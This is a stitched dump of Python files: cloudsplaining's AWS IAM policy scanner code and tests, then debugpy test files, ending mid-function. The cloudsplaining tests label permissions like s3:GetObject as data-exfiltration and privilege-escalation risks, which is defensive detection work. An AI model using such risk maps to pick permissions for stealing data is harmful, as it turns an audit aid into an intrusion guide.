self.update_date = policy_detail.get("UpdateDate")
# Policy Documents are stored here. Multiple indices though. We will evaluate the one
# with IsDefaultVersion only.
self.policy_version_list = policy_detail.get("PolicyVersionList")
self.policy_document = self._policy_document()
def _policy_document(self):
"""Return the policy document object"""
policy_document = {}
for policy_version in self.policy_version_list:
if policy_version.get("IsDefaultVersion") is True:
policy_document = PolicyDocument(policy_version.get("Document"))
return policy_document
# This will help with the Exclusions mechanism. Get the full path of the policy, including the name.
@property
def full_policy_path(self):
"""Get the full policy path, including /aws-service-role/, if applicable"""
return get_full_policy_path(self.arn)
@property
def managed_by(self): # pragma: no cover
"""Determine whether the policy is AWS-Managed or Customer-managed based on a Policy ARN pattern."""
if "arn:aws:iam::aws:" in self.arn:
return "AWS"
else:
return "Customer"
@property
def account_id(self): # pragma: no cover
"""Return the account ID"""
if "arn:aws:iam::aws:" in self.arn:
return "N/A"
else:
account_id = get_account_from_arn(self.arn)
return account_id
```
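A short, self-contained sketch of the input these classes expect is shown below. The dictionary mimics the shape of a "Policies" entry from an account authorization details file; every value is fabricated for illustration.
```python
# Illustrative input for PolicyDetails / PolicyDetail (all values are fabricated).
from cloudsplaining.scan.policy_detail import PolicyDetails

sample_policies = [
    {
        "PolicyName": "ExamplePolicy",
        "PolicyId": "ANPAEXAMPLEID",
        "Arn": "arn:aws:iam::123456789012:policy/ExamplePolicy",
        "Path": "/",
        "DefaultVersionId": "v2",
        "AttachmentCount": 1,
        "IsAttachable": True,
        "PolicyVersionList": [
            {"VersionId": "v1", "IsDefaultVersion": False,
             "Document": {"Version": "2012-10-17", "Statement": []}},
            {"VersionId": "v2", "IsDefaultVersion": True,
             "Document": {"Version": "2012-10-17",
                          "Statement": [{"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "*"}]}},
        ],
    }
]

policy_details = PolicyDetails(sample_policies)
detail = policy_details.policy_details[0]
print(detail.managed_by)            # "Customer": the ARN does not contain "arn:aws:iam::aws:"
print(detail.policy_document.json)  # only the IsDefaultVersion=True document was parsed
```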
#### File: test/output/test_findings.py
```python
import unittest
import json
from cloudsplaining.output.findings import (
UserFinding,
GroupFinding,
RoleFinding,
PolicyFinding,
Finding,
Findings
)
from cloudsplaining.scan.policy_document import PolicyDocument
from cloudsplaining.scan.assume_role_policy_document import AssumeRolePolicyDocument
from cloudsplaining.shared.exclusions import Exclusions
class TestFindings(unittest.TestCase):
def test_new_findings(self):
"""output.new_findings.Findings"""
self.maxDiff = None
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
# (1) If the user is a member of an excluded group, return True
exclusions_cfg = dict(
users=["obama"],
groups=["exclude-group"],
roles=["MyRole"],
policies=["exclude-policy"]
)
exclusions = Exclusions(exclusions_cfg)
attached_managed_policies = [{
"PolicyArn": "arn:aws:iam::aws:policy/AWSLambdaFullAccess",
"PolicyName": "AWSLambdaFullAccess"
}]
# Let's just re-use the same policy for users groups and roles
user_finding = UserFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:user/SomeUser",
actions=["s3:GetObject"],
policy_document=policy_document,
group_membership=["admin"],
attached_managed_policies=attached_managed_policies,
exclusions=exclusions
)
group_finding = GroupFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SomeGroup",
actions=["s3:GetObject"],
policy_document=policy_document,
members=["obama"],
exclusions=exclusions
)
trust_policy_from_compute_service_ecs_tasks = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"sts:AssumeRole"
],
"Principal": {
"Service": "ecs-tasks.amazonaws.com",
"AWS": "arn:aws:iam::012345678910:root",
}
}
]
}
assume_role_policy_document = AssumeRolePolicyDocument(trust_policy_from_compute_service_ecs_tasks)
role_finding = RoleFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:role/SomeRole",
actions=["s3:GetObject"],
policy_document=policy_document,
assume_role_policy_document=assume_role_policy_document,
exclusions=exclusions
)
policy_finding = PolicyFinding(
policy_name="AWSLambdaFullAccess",
arn="arn:aws:iam::aws:policy/AWSLambdaFullAccess",
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions
)
all_findings = Findings(exclusions)
all_findings.add_user_finding(user_finding)
result = all_findings.users[0]
expected_user_result = {
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SomeUser",
"PolicyName": "MyPolicy",
"Type": "User",
"Arn": "arn:aws:iam::123456789012:user/SomeUser",
"AttachedToPrincipal": "SomeUser",
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": None,
"AssumableByComputeService": [],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
}
self.assertDictEqual(result.json, expected_user_result)
principal_policy_mapping = [
{
"Principal": "SomeUser",
"Type": "User",
"PolicyType": "Managed",
"ManagedBy": "AWS",
"PolicyName": "MyPolicy",
"GroupMembership": None,
},
{
"Principal": "SomeUser",
"Type": "User",
"PolicyType": "Managed",
"ManagedBy": "AWS",
"PolicyName": "AWSLambdaFullAccess",
"GroupMembership": None,
},
{
"Principal": "SomeGroup",
"Type": "Group",
"PolicyType": "Managed",
"ManagedBy": "AWS",
"PolicyName": "MyPolicy",
"GroupMembership": None,
},
{
"Principal": "SomeRole",
"Type": "Role",
"PolicyType": "Managed",
"ManagedBy": "AWS",
"PolicyName": "MyPolicy",
"GroupMembership": None,
},
]
all_findings.principal_policy_mapping = principal_policy_mapping
all_findings.add_group_finding(group_finding)
all_findings.add_role_finding(role_finding)
all_findings.add_policy_finding(policy_finding)
# print(len(all_findings))
self.assertEqual(len(all_findings), 4)
results = all_findings.json
expected_results = [
{
"AccountID": "N/A",
"ManagedBy": "AWS",
"Name": "AWSLambdaFullAccess",
"PolicyName": "AWSLambdaFullAccess",
"Type": "Policy",
"Arn": "arn:aws:iam::aws:policy/AWSLambdaFullAccess",
'AttachedToPrincipal': None,
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": None,
"AssumableByComputeService": [],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
},
{
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SomeUser",
"PolicyName": "MyPolicy",
"Type": "User",
"Arn": "arn:aws:iam::123456789012:user/SomeUser",
'AttachedToPrincipal': "SomeUser",
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": None,
"AssumableByComputeService": [],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
},
{
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SomeGroup",
"PolicyName": "MyPolicy",
"Type": "Group",
"Arn": "arn:aws:iam::123456789012:group/SomeGroup",
'AttachedToPrincipal': "SomeGroup",
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": None,
"AssumableByComputeService": [],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
},
{
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SomeRole",
"PolicyName": "MyPolicy",
"Type": "Role",
"Arn": "arn:aws:iam::123456789012:role/SomeRole",
'AttachedToPrincipal': "SomeRole",
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"sts:AssumeRole"
],
"Principal": {
"Service": "ecs-tasks.amazonaws.com",
"AWS": "arn:aws:iam::012345678910:root"
}
}
]
},
"AssumableByComputeService": [
"ecs-tasks"
],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
}
]
# print(json.dumps(all_findings.json, indent=4))
self.maxDiff = None
self.assertListEqual(results, expected_results)
class TestNewFinding(unittest.TestCase):
def test_principal_findings(self):
"""output.new_findings.UserFinding"""
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
# (1) If the user is a member of an excluded group, return True
exclusions_cfg = dict(
users=["obama"],
groups=["admin"],
roles=["MyRole"],
policies=["AWSLambdaFullAccess"]
)
exclusions = Exclusions(exclusions_cfg)
user_finding = UserFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:user/SomeUser",
actions=["s3:GetObject"],
policy_document=policy_document,
group_membership=["admin"],
exclusions=exclusions
)
result = user_finding.is_excluded(exclusions)
expected_result = ["admin"]
self.assertListEqual(result, expected_result)
# (2) If the user is explicitly excluded, return True
exclusions = Exclusions(exclusions_cfg)
user_finding = UserFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:user/obama", # Obama is excluded
actions=["s3:GetObject"],
policy_document=policy_document,
group_membership=["not-excluded-group"],
exclusions=exclusions
)
result = user_finding.is_excluded(exclusions)
expected_result = ["obama"]
self.assertListEqual(result, expected_result)
# (3) If the policy attached is excluded
user_finding = UserFinding(
policy_name="AWSLambdaFullAccess",
arn="arn:aws:iam::123456789012:user/not-excluded-user", # Obama is excluded
actions=["s3:GetObject"],
policy_document=policy_document,
group_membership=["not-excluded-group"],
exclusions=exclusions
)
result = user_finding.is_excluded(exclusions)
expected_result = ["AWSLambdaFullAccess"]
self.assertListEqual(result, expected_result)
def test_group_membership_finding(self):
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
exclusions_cfg = dict(
users=["obama"],
groups=["admin"],
roles=["MyRole"],
policies=["AWSLambdaFullAccess"]
)
exclusions = Exclusions(exclusions_cfg)
group_finding = GroupFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/GroupShouldBeEmpty",
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions,
members=["obama"]
)
result = group_finding.is_excluded(exclusions)
self.assertListEqual(result, [])
group_finding = GroupFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/GroupShouldBeEmpty",
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions,
members=["yolo"]
)
self.assertFalse(group_finding.is_excluded(exclusions))
def test_policy_action_exclusion_findings(self):
print()
def test_policy_name_finding(self):
"""output.new_findings.PolicyFinding"""
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
exclusions_cfg = dict(
users=["obama"],
groups=["admin"],
roles=["MyRole"],
policies=["AWSLambdaFullAccess"]
)
exclusions = Exclusions(exclusions_cfg)
# (1) If the policy attached is excluded
policy_finding = PolicyFinding(
policy_name="AWSLambdaFullAccess",
arn="arn:aws:iam::aws:policy/AWSLambdaFullAccess", # Obama is excluded
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions
)
result = policy_finding.is_excluded(exclusions)
expected_result = ["AWSLambdaFullAccess"]
self.assertListEqual(result, expected_result)
# (2) Non-exclusion
exclusions_cfg = dict(
users=["obama"],
groups=["admin"],
roles=["MyRole"],
policies=["someOtherName"]
)
exclusions = Exclusions(exclusions_cfg)
result = policy_finding.is_excluded(exclusions)
expected_result = False
self.assertEqual(result, expected_result)
def test_finding_attributes(self):
"""scan.findings.new_finding"""
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
finding = Finding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SNSNotifications",
actions=["s3:GetObject"],
policy_document=policy_document
)
self.assertEqual(finding.account_id, "123456789012")
self.assertEqual(finding.managed_by, "Customer")
self.assertEqual(len(finding.services_affected), 1)
self.assertEqual(len(finding.actions), 1)
self.assertDictEqual(finding.policy_document.json, policy_document.json)
expected_finding_json = {
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SNSNotifications",
"PolicyName": "MyPolicy",
"Type": "Group",
"Arn": "arn:aws:iam::123456789012:group/SNSNotifications",
"AttachedToPrincipal": None,
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumableByComputeService": [],
"AssumeRolePolicyDocument": None,
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": [],
}
print(json.dumps(finding.json, indent=4))
self.maxDiff = None
self.assertDictEqual(finding.json, expected_finding_json)
def test_finding_actions_excluded(self):
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject",
"logs:CreateLogStream",
"logs:PutLogEvents"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
# (1) EXCLUDE actions
exclusions_cfg = {
"users": ["obama"],
"groups": ["admin"],
"roles": ["MyRole"],
"policies": ["someOtherName"],
"exclude-actions": [
"logs:CreateLogStream",
"logs:PutLogEvents"
]
}
exclusions = Exclusions(exclusions_cfg)
finding = Finding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SNSNotifications",
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions
)
# print(finding.actions)
self.assertListEqual(finding.actions, ["s3:GetObject"])
def test_finding_actions_included(self):
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject",
"ec2:DescribeInstances", # This is a bad thing to include, but just for the hell of it
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
# (2) INCLUDE actions
exclusions_cfg = {
"users": ["obama"],
"groups": ["admin"],
"roles": ["MyRole"],
"policies": ["someOtherName"],
"include-actions": [
"ec2:DescribeInstances"
],
"exclude-actions": [
"s3:GetObject",
],
}
exclusions = Exclusions(exclusions_cfg)
finding = Finding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SNSNotifications",
actions=["s3:GetObject", "ec2:DescribeInstances"],
policy_document=policy_document,
exclusions=exclusions
)
# print(finding.actions)
expected_results = [
"ec2:DescribeInstances",
]
self.assertListEqual(finding.actions, expected_results)
group_finding = GroupFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SNSNotifications",
actions=["s3:GetObject", "ec2:DescribeInstances"],
policy_document=policy_document,
exclusions=exclusions,
members=None
)
self.assertListEqual(group_finding.actions, expected_results)
def test_findings_for_roles_assumable_by_compute_services_ecs_tasks_new(self):
trust_policy_from_compute_service_ecs_tasks = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"sts:AssumeRole"
],
"Principal": {
"Service": "ecs-tasks.amazonaws.com",
"AWS": "arn:aws:iam::012345678910:root",
}
}
]
}
assume_role_policy_document = AssumeRolePolicyDocument(trust_policy_from_compute_service_ecs_tasks)
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
finding = Finding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:role/TestComputeService",
actions=["s3:GetObject"],
policy_document=policy_document,
assume_role_policy_document=assume_role_policy_document
)
# print(finding.role_assumable_by_compute_services)
self.assertListEqual(finding.role_assumable_by_compute_services, ["ecs-tasks"])
role_finding = RoleFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:role/TestComputeService",
actions=["s3:GetObject"],
policy_document=policy_document,
assume_role_policy_document=assume_role_policy_document
)
self.assertListEqual(role_finding.role_assumable_by_compute_services, ["ecs-tasks"])
```
#### File: test/scanning/test_principal_detail.py
```python
import os
import unittest
import json
from cloudsplaining.scan.principal_detail import PrincipalDetail, PrincipalTypeDetails
example_authz_details_file = os.path.abspath(
os.path.join(
os.path.dirname(__file__),
os.path.pardir,
"files",
"example-authz-details.json",
)
)
with open(example_authz_details_file) as f:
contents = f.read()
auth_details_json = json.loads(contents)
# class TestPrincipalTypeDetails(unittest.TestCase):
#
# def test_principal_type_details(self):
# raw_role_detail_list = auth_details_json.get("RoleDetailList")
# role_detail_list = PrincipalTypeDetails(raw_role_detail_list)
class TestPrincipalDetail(unittest.TestCase):
def test_user_principal(self):
principal_detail = auth_details_json["UserDetailList"][1]
user_principal_detail = PrincipalDetail(principal_detail)
result = user_principal_detail.policy_list[0]["PolicyDocument"].json
expected_result = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:GetObject"
],
"Resource": [
"*"
]
}
]
}
self.assertDictEqual(result, expected_result)
result = user_principal_detail.policy_list[0]["PolicyName"]
expected_result = "InsecureUserPolicy"
self.assertEqual(result, expected_result)
def test_principal_attributes(self):
"""scan.principals.Principal: Testing Principal simple attributes"""
principal_detail = auth_details_json["UserDetailList"][1]
user_principal_detail = PrincipalDetail(principal_detail)
self.assertEqual(user_principal_detail.name, "userwithlotsofpermissions")
self.assertEqual(user_principal_detail.principal_type, "User")
def test_account_id(self):
"""scan.principals.Principal.account_id"""
principal_detail = auth_details_json["UserDetailList"][1]
user_principal_detail = PrincipalDetail(principal_detail)
self.assertEqual(user_principal_detail.account_id, "012345678901")
def test_group_principal_detail(self):
"""scan.principal_detail.Principal: Testing group"""
principal_detail = {
"Path": "/",
"GroupName": "GOAT",
"GroupId": "GreatestOfAllTime",
"Arn": "arn:aws:iam::012345678901:group/GOAT",
"CreateDate": "2017-05-15 17:33:36+00:00",
"GroupPolicyList": [
{
"PolicyName": "SsmOnboardingInlinePolicy",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:GetObject"
],
"Resource": "*"
}
]
}
}
],
"AttachedManagedPolicies": [
{
"PolicyName": "AdministratorAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
}
]
}
group_principal_detail = PrincipalDetail(principal_detail)
self.assertEqual(group_principal_detail.policy_list[0]["PolicyName"], "SsmOnboardingInlinePolicy")
self.assertEqual(group_principal_detail.policy_list[0]["PolicyName"], "SsmOnboardingInlinePolicy")
# Group with attached managed policies
expected_result = [
{
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess",
"PolicyName": "AdministratorAccess"
}
]
results = group_principal_detail.attached_managed_policies
# print(json.dumps(results, indent=4))
self.assertListEqual(results, expected_result)
class TestPrincipalTrustPolicies(unittest.TestCase):
def test_principal_assume_role_policy_document_json(self):
"""scan.principals.Principal.assume_role_policy_document.json"""
principal_detail = auth_details_json["RoleDetailList"][2]
# print(json.dumps(principal_detail, indent=4))
role_principal_detail = PrincipalDetail(principal_detail)
expected_result = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
# print(json.dumps(role_principal_detail.assume_role_policy_document.json, indent=4))
self.assertDictEqual(role_principal_detail.assume_role_policy_document.json, expected_result)
self.assertDictEqual(role_principal_detail.assume_role_from_compute.json, expected_result)
``` |
{
"source": "jhutchings1/debugpy",
"score": 2
} |
#### File: tests_python/resources/_debugger_case_source_mapping_jmc.py
```python
def full_function():
# Note that this function is not called, it's there just to make the mapping explicit. # map to cell1, line 1
import sys # map to cell1, line 2
frame = sys._getframe() # map to cell1, line 3
if py_db.in_project_scope(frame, '<cell1>') != expect_in_project_scope: # map to cell1, line 4
raise AssertionError('Expected <cell1> to be in project scope: %s' % (expect_in_project_scope,)) # map to cell1, line 5
a = 1 # map to cell1, line 6
b = 2 # map to cell1, line 7
def create_code():
cell1_code = compile(''' # line 1
import sys # line 2
frame = sys._getframe() # line 3
if py_db.in_project_scope(frame, '<cell1>') != expect_in_project_scope: # line 4
raise AssertionError('Expected <cell1> to be in project scope: %s' % (expect_in_project_scope,)) # line 5
a = 1 # line 6
b = 2 # line 7
''', '<cell1>', 'exec')
return {'cell1': cell1_code}
if __name__ == '__main__':
code = create_code()
import pydevd
py_db = pydevd.get_global_debugger()
expect_in_project_scope = True
exec(code['cell1']) # When executing, stop at breakpoint and then remove the source mapping.
expect_in_project_scope = False
exec(code['cell1']) # Should no longer stop.
print('TEST SUCEEDED')
```
#### File: pydevd/tests_python/test_pydevd_filtering.py
```python
from _pydevd_bundle.pydevd_constants import IS_WINDOWS
def test_in_project_roots(tmpdir):
from _pydevd_bundle.pydevd_filtering import FilesFiltering
files_filtering = FilesFiltering()
import os.path
import sys
assert files_filtering._get_library_roots() == [
os.path.normcase(x) for x in files_filtering._get_default_library_roots()]
site_packages = tmpdir.mkdir('site-packages')
project_dir = tmpdir.mkdir('project')
project_dir_inside_site_packages = str(site_packages.mkdir('project'))
site_packages_inside_project_dir = str(project_dir.mkdir('site-packages'))
# Convert from pytest paths to str.
site_packages = str(site_packages)
project_dir = str(project_dir)
tmpdir = str(tmpdir)
# Test permutations of project dir inside site packages and vice-versa.
files_filtering.set_project_roots([project_dir, project_dir_inside_site_packages])
files_filtering.set_library_roots([site_packages, site_packages_inside_project_dir])
check = [
(tmpdir, False),
(site_packages, False),
(site_packages_inside_project_dir, False),
(project_dir, True),
(project_dir_inside_site_packages, True),
]
for (check_path, find) in check[:]:
check.append((os.path.join(check_path, 'a.py'), find))
for check_path, find in check:
assert files_filtering.in_project_roots(check_path) == find
files_filtering.set_project_roots([])
files_filtering.set_library_roots([site_packages, site_packages_inside_project_dir])
# If the IDE did not set the project roots, consider anything not in the site
# packages as being in a project root (i.e.: we can calculate default values for
# site-packages but not for project roots).
check = [
(tmpdir, True),
(site_packages, False),
(site_packages_inside_project_dir, False),
(project_dir, True),
(project_dir_inside_site_packages, False),
('<foo>', False),
('<ipython>', True),
('<frozen importlib._bootstrap>', False),
]
for check_path, find in check:
assert files_filtering.in_project_roots(check_path) == find, \
'Expected: %s to be a part of the project: %s' % (check_path, find)
sys.path.append(str(site_packages))
try:
default_library_roots = files_filtering._get_default_library_roots()
assert len(set(default_library_roots)) == len(default_library_roots), \
'Duplicated library roots found in: %s' % (default_library_roots,)
assert str(site_packages) in default_library_roots
for path in sys.path:
if os.path.exists(path) and path.endswith('site-packages'):
assert path in default_library_roots
finally:
sys.path.remove(str(site_packages))
def test_filtering(tmpdir):
from _pydevd_bundle.pydevd_filtering import FilesFiltering
from _pydevd_bundle.pydevd_filtering import ExcludeFilter
files_filtering = FilesFiltering()
site_packages = tmpdir.mkdir('site-packages')
project_dir = tmpdir.mkdir('project')
project_dir_inside_site_packages = str(site_packages.mkdir('project'))
site_packages_inside_project_dir = str(project_dir.mkdir('site-packages'))
files_filtering.set_exclude_filters([
ExcludeFilter('**/project*', True, True),
ExcludeFilter('**/bar*', False, True),
])
assert files_filtering.exclude_by_filter('/foo/project', None) is True
assert files_filtering.exclude_by_filter('/foo/unmatched', None) is None
assert files_filtering.exclude_by_filter('/foo/bar', None) is False
def test_glob_matching():
from _pydevd_bundle.pydevd_filtering import glob_matches_path
# Linux
for sep, altsep in (('\\', '/'), ('/', None)):
def build(path):
if sep == '/':
return path
else:
return ('c:' + path).replace('/', '\\')
assert glob_matches_path(build('/a'), r'*', sep, altsep)
assert not glob_matches_path(build('/a/b/c/some.py'), '/a/**/c/so?.py', sep, altsep)
assert glob_matches_path('/a/b/c', '/a/b/*')
assert not glob_matches_path('/a/b', '/*')
assert glob_matches_path('/a/b', '/*/b')
assert glob_matches_path('/a/b', '**/*')
assert not glob_matches_path('/a/b', '**/a')
assert glob_matches_path(build('/a/b/c/d'), '**/d', sep, altsep)
assert not glob_matches_path(build('/a/b/c/d'), '**/c', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '**/c/d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '**/b/c/d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '/*/b/*/d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '**/c/*', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '/a/**/c/*', sep, altsep)
assert glob_matches_path(build('/a/b/c/d.py'), '/a/**/c/*', sep, altsep)
assert glob_matches_path(build('/a/b/c/d.py'), '/a/**/c/*.py', sep, altsep)
assert glob_matches_path(build('/a/b/c/some.py'), '/a/**/c/so*.py', sep, altsep)
assert glob_matches_path(build('/a/b/c/some.py'), '/a/**/c/som?.py', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '/**', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '/**/d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d.py'), '/**/*.py', sep, altsep)
assert glob_matches_path(build('/a/b/c/d.py'), '**/c/*.py', sep, altsep)
if IS_WINDOWS:
assert glob_matches_path(build('/a/b/c/d.py'), '**/C/*.py', sep, altsep)
assert glob_matches_path(build('/a/b/C/d.py'), '**/c/*.py', sep, altsep)
# Expected not to match.
assert not glob_matches_path(build('/a/b/c/d'), '/**/d.py', sep, altsep)
assert not glob_matches_path(build('/a/b/c/d.pyx'), '/a/**/c/*.py', sep, altsep)
assert not glob_matches_path(build('/a/b/c/d'), '/*/d', sep, altsep)
if sep == '/':
assert not glob_matches_path(build('/a/b/c/d'), r'**\d', sep, altsep) # Match with \ doesn't work on linux...
assert not glob_matches_path(build('/a/b/c/d'), r'c:\**\d', sep, altsep) # Match with drive doesn't work on linux...
else:
# Works in Windows.
assert glob_matches_path(build('/a/b/c/d'), r'**\d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), r'c:\**\d', sep, altsep)
# Corner cases
assert not glob_matches_path(build('/'), r'', sep, altsep)
assert glob_matches_path(build(''), r'', sep, altsep)
assert not glob_matches_path(build(''), r'**', sep, altsep)
assert glob_matches_path(build('/'), r'**', sep, altsep)
assert glob_matches_path(build('/'), r'*', sep, altsep)
def test_rules_to_exclude_filter(tmpdir):
from _pydevd_bundle.pydevd_process_net_command_json import _convert_rules_to_exclude_filters
from _pydevd_bundle.pydevd_filtering import ExcludeFilter
from random import shuffle
dira = tmpdir.mkdir('a')
dirb = dira.mkdir('b')
fileb = dirb.join('fileb.py')
fileb2 = dirb.join('fileb2.py')
with fileb.open('w') as stream:
stream.write('')
def filename_to_server(filename):
return filename
def on_error(msg):
raise AssertionError(msg)
rules = [
{'path': str(dira), 'include': False},
{'path': str(dirb), 'include': True},
{'path': str(fileb), 'include': True},
{'path': str(fileb2), 'include': True},
{'path': '**/foo/*.py', 'include': True},
{'module': 'bar', 'include': False},
{'module': 'bar.foo', 'include': True},
]
shuffle(rules)
exclude_filters = _convert_rules_to_exclude_filters(rules, filename_to_server, on_error)
assert exclude_filters == [
ExcludeFilter(name=str(fileb2), exclude=False, is_path=True),
ExcludeFilter(name=str(fileb), exclude=False, is_path=True),
ExcludeFilter(name=str(dirb) + '/**', exclude=False, is_path=True),
ExcludeFilter(name=str(dira) + '/**', exclude=True, is_path=True),
ExcludeFilter(name='**/foo/*.py', exclude=False, is_path=True),
ExcludeFilter(name='bar.foo', exclude=False, is_path=False),
ExcludeFilter(name='bar', exclude=True, is_path=False),
]
```
#### File: tests/debugpy/test_multiproc.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest
import sys
import debugpy
import tests
from tests import debug
from tests.debug import runners
from tests.patterns import some
if not tests.full:
@pytest.fixture(params=[runners.launch] + runners.all_attach_socket)
def run(request):
return request.param
def expected_subprocess_config(parent_session):
config = dict(parent_session.config)
for key in "args", "listen", "postDebugTask", "preLaunchTask", "processId":
config.pop(key, None)
config.update(
{
"name": some.str,
"request": "attach",
"subProcessId": some.int,
"connect": {"host": some.str, "port": some.int},
}
)
return config
@pytest.mark.parametrize(
"start_method",
[""]
if sys.version_info < (3,)
else ["spawn"]
if sys.platform == "win32"
else ["spawn", "fork"],
)
def test_multiprocessing(pyfile, target, run, start_method):
if start_method == "spawn" and sys.platform != "win32":
pytest.skip("https://github.com/microsoft/ptvsd/issues/1887")
@pyfile
def code_to_debug():
import debuggee
import multiprocessing
import os
import sys
# https://github.com/microsoft/ptvsd/issues/2108
class Foo(object):
pass
def parent(q, a):
from debuggee import backchannel
debuggee.setup()
print("spawning child")
p = multiprocessing.Process(target=child, args=(q, a))
p.start()
print("child spawned")
q.put("foo?")
foo = a.get()
